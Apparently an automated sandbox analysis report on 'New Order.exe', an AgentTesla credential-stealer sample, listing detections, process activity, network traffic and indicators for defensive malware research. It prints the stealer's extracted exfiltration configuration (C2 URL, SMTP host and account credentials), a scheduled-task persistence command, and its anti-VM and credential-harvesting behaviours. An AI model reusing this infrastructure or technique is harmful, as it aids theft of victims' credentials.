Play interactive tour

Edit tour

Analysis Report New Order.exe

Overview

General Information

Sample Name:	New Order.exe
Analysis ID:	345000
MD5:	3462afcbdb0969b7f24b42f0e42c7988
SHA1:	6429f37abdf26c93793eccdd8dc0ecaffb149655
SHA256:	112f430a8cc28d3889163bbaf9811c74c3d2af2c9af672d16f0f7888df6d51e2
Tags:	AgentTeslaexe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains potential unpacker

.NET source code contains very large array initializations

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses schtasks.exe or at.exe to add and modify task schedules

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

New Order.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\New Order.exe' MD5: 3462AFCBDB0969B7F24B42F0E42C7988)

schtasks.exe (PID: 6120 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

New Order.exe (PID: 4652 cmdline: {path} MD5: 3462AFCBDB0969B7F24B42F0E42C7988)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "xTnivYecyez3mEL", "URL: ": "https://sO7lUZh6d9PCQs.org", "To: ": "wonder@pulpdant.com", "ByHost: ": "smtp.pulpdant.com:587", "Password: ": "7uA2gBhi", "From: ": "wonder@pulpdant.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.365875763.00000000042E9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: New Order.exe PID: 4652	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: New Order.exe PID: 4652	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: New Order.exe PID: 5976	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: New Order.exe PID: 5976	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.New Order.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\New Order.exe' , ParentImage: C:\Users\user\Desktop\New Order.exe, ParentProcessId: 5976, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp', ProcessId: 6120

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: New Order.exe.4652.3.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "xTnivYecyez3mEL", "URL: ": "https://sO7lUZh6d9PCQs.org", "To: ": "wonder@pulpdant.com", "ByHost: ": "smtp.pulpdant.com:587", "Password: ": "7uA2gBhi", "From: ": "wonder@pulpdant.com"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe

ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Show sources

Source: New Order.exe	Virustotal: Detection: 24%			Perma Link
Source: New Order.exe	ReversingLabs: Detection: 28%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: New Order.exe

Joe Sandbox ML: detected

Source: 3.2.New Order.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Compliance:

Uses 32bit PE files

Show sources

Source: New Order.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: New Order.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Software Vulnerabilities:

Source: C:\Users\user\Desktop\New Order.exe	Code function: 4x nop then jmp 07F460E5h		0_2_07F46070
Source: C:\Users\user\Desktop\New Order.exe	Code function: 4x nop then jmp 07F460E5h		0_2_07F4605F

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49712 -> 208.91.199.224:587

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://sO7lUZh6d9PCQs.org

Source: global traffic

TCP traffic: 192.168.2.6:49712 -> 208.91.199.224:587

Source: Joe Sandbox View

IP Address: 208.91.199.224 208.91.199.224

Source: global traffic

TCP traffic: 192.168.2.6:49712 -> 208.91.199.224:587

Source: unknown

DNS traffic detected: queries for: smtp.pulpdant.com

Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: http://SgOtfE.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: New Order.exe, 00000003.00000002.691773465.00000000033DE000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.pulpdant.com
Source: New Order.exe, 00000003.00000002.691773465.00000000033DE000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: New Order.exe, 00000000.00000002.370232451.0000000007462000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%$
Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp, New Order.exe, 00000003.00000002.691808565.00000000033ED000.00000004.00000001.sdmp	String found in binary or memory: https://sO7lUZh6d9PCQs.org
Source: New Order.exe, 00000000.00000002.365875763.00000000042E9000.00000004.00000001.sdmp, New Order.exe, 00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: New Order.exe, 00000003.00000002.690207756.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 3.2.New Order.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b702653DBu002d2896u002d4AA5u002dB4C0u002d85668FB20A77u007d/u00318369049u002dD0BAu002d4846u002d9DAAu002d129B18C0E841.cs

Large array initialization: .cctor: array initializer size 11951

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: New Order.exe

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F47228	0_2_07F47228
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F448E2	0_2_07F448E2
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F43428	0_2_07F43428
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F407F8	0_2_07F407F8
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F46070	0_2_07F46070
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F44068	0_2_07F44068
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F4605F	0_2_07F4605F
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F4341A	0_2_07F4341A
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_07F40808	0_2_07F40808
Source: C:\Users\user\Desktop\New Order.exe	Code function: 3_2_015B46A0	3_2_015B46A0
Source: C:\Users\user\Desktop\New Order.exe	Code function: 3_2_015B4661	3_2_015B4661
Source: C:\Users\user\Desktop\New Order.exe	Code function: 3_2_015B4681	3_2_015B4681
Source: C:\Users\user\Desktop\New Order.exe	Code function: 3_2_015BDA00	3_2_015BDA00

Source: New Order.exe, 00000000.00000002.365090129.00000000032E1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamepnfWtWgzragntIDlAJfP.exe4 vs New Order.exe
Source: New Order.exe, 00000000.00000002.365195256.0000000003361000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs New Order.exe
Source: New Order.exe, 00000000.00000002.364064611.0000000000FEE000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs New Order.exe
Source: New Order.exe, 00000000.00000002.372870683.0000000008650000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs New Order.exe
Source: New Order.exe, 00000000.00000002.371338764.0000000007D40000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs New Order.exe
Source: New Order.exe, 00000003.00000002.689201074.000000000147A000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs New Order.exe
Source: New Order.exe, 00000003.00000002.688125243.0000000001138000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs New Order.exe
Source: New Order.exe, 00000003.00000002.688057072.0000000000D6E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs New Order.exe
Source: New Order.exe, 00000003.00000002.687646589.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamepnfWtWgzragntIDlAJfP.exe4 vs New Order.exe
Source: New Order.exe	Binary or memory string: OriginalFilename vs New Order.exe

Source: C:\Users\user\Desktop\New Order.exe

Section loaded: windows.staterepositoryps.dll

Jump to behavior

Source: New Order.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 3.2.New Order.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.New Order.exe.400000.0.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/3@2/1

Source: C:\Users\user\Desktop\New Order.exe

File created: C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_01
Source: C:\Users\user\Desktop\New Order.exe	Mutant created: \Sessions\1\BaseNamedObjects\oIkqkTNPDBcek

Source: C:\Users\user\Desktop\New Order.exe

File created: C:\Users\user\AppData\Local\Temp\tmpC36D.tmp

Jump to behavior

Source: New Order.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\New Order.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\New Order.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\New Order.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: New Order.exe	Virustotal: Detection: 24%
Source: New Order.exe	ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\New Order.exe

File read: C:\Users\user\Desktop\New Order.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\New Order.exe 'C:\Users\user\Desktop\New Order.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\New Order.exe {path}
Source: C:\Users\user\Desktop\New Order.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process created: C:\Users\user\Desktop\New Order.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: New Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: New Order.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: New Order.exe, loginForm.cs	.Net Code: SuspendLayout System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: veTETlsQyxlWT.exe.0.dr, loginForm.cs	.Net Code: SuspendLayout System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.New Order.exe.f30000.0.unpack, loginForm.cs	.Net Code: SuspendLayout System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.New Order.exe.f30000.0.unpack, loginForm.cs	.Net Code: SuspendLayout System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.New Order.exe.cb0000.1.unpack, loginForm.cs	.Net Code: SuspendLayout System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.New Order.exe.cb0000.0.unpack, loginForm.cs	.Net Code: SuspendLayout System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_07F45D54 pushfd ; ret

0_2_07F45D55

Source: initial sample	Static PE information: section name: .text entropy: 7.54927053001
Source: initial sample	Static PE information: section name: .text entropy: 7.54927053001

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\New Order.exe

File created: C:\Users\user\AppData\Roaming\veTETlsQyxlWT.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\veTETlsQyxlWT' /XML 'C:\Users\user\AppData\Local\Temp\tmpC36D.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
